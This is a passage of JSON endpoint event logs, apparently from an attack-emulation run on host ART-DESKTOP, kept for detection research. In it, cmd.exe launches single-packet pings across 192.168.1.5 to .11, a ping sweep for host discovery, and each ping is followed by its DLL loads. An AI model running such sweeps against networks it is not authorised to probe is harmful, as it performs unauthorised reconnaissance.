"unique_pid": "{42FC7E13-CB50-5C05-0000-0010B8765101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 996, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572004800000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010B8765101}" - }, - { - 
"event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 996, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572004800000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010B8765101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 996, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572004800000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010B8765101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 996, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572004800000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010B8765101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 996, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572004800000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010B8765101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 996, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572004960000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010B8765101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 996, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572004960000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010B8765101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 996, - 
"process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572004960000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010B8765101}" - }, - { - "event_type": "process", - "pid": 996, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572006840000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010B8765101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.5", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3004, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572006980000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-001027795101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3004, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572006990000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-001027795101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3004, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572006990000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-001027795101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3004, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572006990000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-001027795101}" - }, - { - "event_type": "image_load", - "image_name": 
"KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3004, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572006990000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-001027795101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3004, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572006990000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-001027795101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3004, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572006990000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-001027795101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3004, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572006990000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-001027795101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3004, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572006990000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-001027795101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3004, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572006990000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-001027795101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3004, - "process_name": "PING.EXE", - 
"process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572006990000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-001027795101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3004, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572006990000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-001027795101}" - }, - { - "event_type": "process", - "pid": 3004, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572011840000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-001027795101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.6", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4736, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572011980000, - "unique_pid": "{42FC7E13-CB51-5C05-0000-0010947B5101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4736, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572011990000, - "unique_pid": "{42FC7E13-CB51-5C05-0000-0010947B5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4736, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572011990000, - "unique_pid": "{42FC7E13-CB51-5C05-0000-0010947B5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": 
"C:\\Windows\\System32\\kernel32.dll", - "pid": 4736, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572011990000, - "unique_pid": "{42FC7E13-CB51-5C05-0000-0010947B5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4736, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572011990000, - "unique_pid": "{42FC7E13-CB51-5C05-0000-0010947B5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4736, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572011990000, - "unique_pid": "{42FC7E13-CB51-5C05-0000-0010947B5101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4736, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572011990000, - "unique_pid": "{42FC7E13-CB51-5C05-0000-0010947B5101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4736, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572011990000, - "unique_pid": "{42FC7E13-CB51-5C05-0000-0010947B5101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4736, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572011990000, - "unique_pid": "{42FC7E13-CB51-5C05-0000-0010947B5101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4736, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572011990000, - "unique_pid": "{42FC7E13-CB51-5C05-0000-0010947B5101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4736, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572011990000, - "unique_pid": "{42FC7E13-CB51-5C05-0000-0010947B5101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4736, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572011990000, - "unique_pid": "{42FC7E13-CB51-5C05-0000-0010947B5101}" - }, - { - "event_type": "process", - "pid": 4736, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572016840000, - "unique_pid": "{42FC7E13-CB51-5C05-0000-0010947B5101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.7", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7988, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572016980000, - "unique_pid": "{42FC7E13-CB51-5C05-0000-0010287E5101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572016980000, - "unique_pid": "{42FC7E13-CB51-5C05-0000-0010287E5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": 
"C:\\Windows\\System32\\ntdll.dll", - "pid": 7988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572016980000, - "unique_pid": "{42FC7E13-CB51-5C05-0000-0010287E5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572016980000, - "unique_pid": "{42FC7E13-CB51-5C05-0000-0010287E5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572016980000, - "unique_pid": "{42FC7E13-CB51-5C05-0000-0010287E5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572016980000, - "unique_pid": "{42FC7E13-CB51-5C05-0000-0010287E5101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572016980000, - "unique_pid": "{42FC7E13-CB51-5C05-0000-0010287E5101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572016980000, - "unique_pid": "{42FC7E13-CB51-5C05-0000-0010287E5101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7988, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572016980000, - "unique_pid": "{42FC7E13-CB51-5C05-0000-0010287E5101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572016980000, - "unique_pid": "{42FC7E13-CB51-5C05-0000-0010287E5101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572016980000, - "unique_pid": "{42FC7E13-CB51-5C05-0000-0010287E5101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572016980000, - "unique_pid": "{42FC7E13-CB51-5C05-0000-0010287E5101}" - }, - { - "event_type": "process", - "pid": 7988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572021990000, - "unique_pid": "{42FC7E13-CB51-5C05-0000-0010287E5101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.8", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4412, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572022140000, - "unique_pid": "{42FC7E13-CB52-5C05-0000-001097805101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": 
"C:\\Windows\\System32\\PING.EXE", - "pid": 4412, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572022140000, - "unique_pid": "{42FC7E13-CB52-5C05-0000-001097805101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4412, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572022140000, - "unique_pid": "{42FC7E13-CB52-5C05-0000-001097805101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4412, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572022140000, - "unique_pid": "{42FC7E13-CB52-5C05-0000-001097805101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4412, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572022140000, - "unique_pid": "{42FC7E13-CB52-5C05-0000-001097805101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4412, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572022140000, - "unique_pid": "{42FC7E13-CB52-5C05-0000-001097805101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4412, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572022140000, - "unique_pid": "{42FC7E13-CB52-5C05-0000-001097805101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4412, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572022140000, - "unique_pid": "{42FC7E13-CB52-5C05-0000-001097805101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4412, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572022140000, - "unique_pid": "{42FC7E13-CB52-5C05-0000-001097805101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4412, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572022140000, - "unique_pid": "{42FC7E13-CB52-5C05-0000-001097805101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4412, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572022140000, - "unique_pid": "{42FC7E13-CB52-5C05-0000-001097805101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4412, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572022140000, - "unique_pid": "{42FC7E13-CB52-5C05-0000-001097805101}" - }, - { - "event_type": "process", - "pid": 4412, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572026840000, - "unique_pid": "{42FC7E13-CB52-5C05-0000-001097805101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.9", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5688, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 
131883572026980000, - "unique_pid": "{42FC7E13-CB52-5C05-0000-00100F835101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572026990000, - "unique_pid": "{42FC7E13-CB52-5C05-0000-00100F835101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572026990000, - "unique_pid": "{42FC7E13-CB52-5C05-0000-00100F835101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572026990000, - "unique_pid": "{42FC7E13-CB52-5C05-0000-00100F835101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572026990000, - "unique_pid": "{42FC7E13-CB52-5C05-0000-00100F835101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572026990000, - "unique_pid": "{42FC7E13-CB52-5C05-0000-00100F835101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5688, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572026990000, - "unique_pid": "{42FC7E13-CB52-5C05-0000-00100F835101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572026990000, - "unique_pid": "{42FC7E13-CB52-5C05-0000-00100F835101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572026990000, - "unique_pid": "{42FC7E13-CB52-5C05-0000-00100F835101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572026990000, - "unique_pid": "{42FC7E13-CB52-5C05-0000-00100F835101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572026990000, - "unique_pid": "{42FC7E13-CB52-5C05-0000-00100F835101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572026990000, - "unique_pid": "{42FC7E13-CB52-5C05-0000-00100F835101}" - }, - { - "event_type": "process", - "pid": 5688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572031990000, - "unique_pid": "{42FC7E13-CB52-5C05-0000-00100F835101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.10", 
- "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 904, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572032130000, - "unique_pid": "{42FC7E13-CB53-5C05-0000-00107A855101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 904, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572032140000, - "unique_pid": "{42FC7E13-CB53-5C05-0000-00107A855101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 904, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572032140000, - "unique_pid": "{42FC7E13-CB53-5C05-0000-00107A855101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 904, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572032140000, - "unique_pid": "{42FC7E13-CB53-5C05-0000-00107A855101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 904, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572032140000, - "unique_pid": "{42FC7E13-CB53-5C05-0000-00107A855101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 904, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 
131883572032140000, - "unique_pid": "{42FC7E13-CB53-5C05-0000-00107A855101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 904, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572032140000, - "unique_pid": "{42FC7E13-CB53-5C05-0000-00107A855101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 904, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572032140000, - "unique_pid": "{42FC7E13-CB53-5C05-0000-00107A855101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 904, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572032140000, - "unique_pid": "{42FC7E13-CB53-5C05-0000-00107A855101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 904, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572032140000, - "unique_pid": "{42FC7E13-CB53-5C05-0000-00107A855101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 904, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572032140000, - "unique_pid": "{42FC7E13-CB53-5C05-0000-00107A855101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 904, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572032140000, - "unique_pid": "{42FC7E13-CB53-5C05-0000-00107A855101}" - }, - { - "event_type": "process", - "pid": 904, - 
"process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572036840000, - "unique_pid": "{42FC7E13-CB53-5C05-0000-00107A855101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.11", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6288, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572036980000, - "unique_pid": "{42FC7E13-CB53-5C05-0000-0010F9875101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6288, - "process_name": 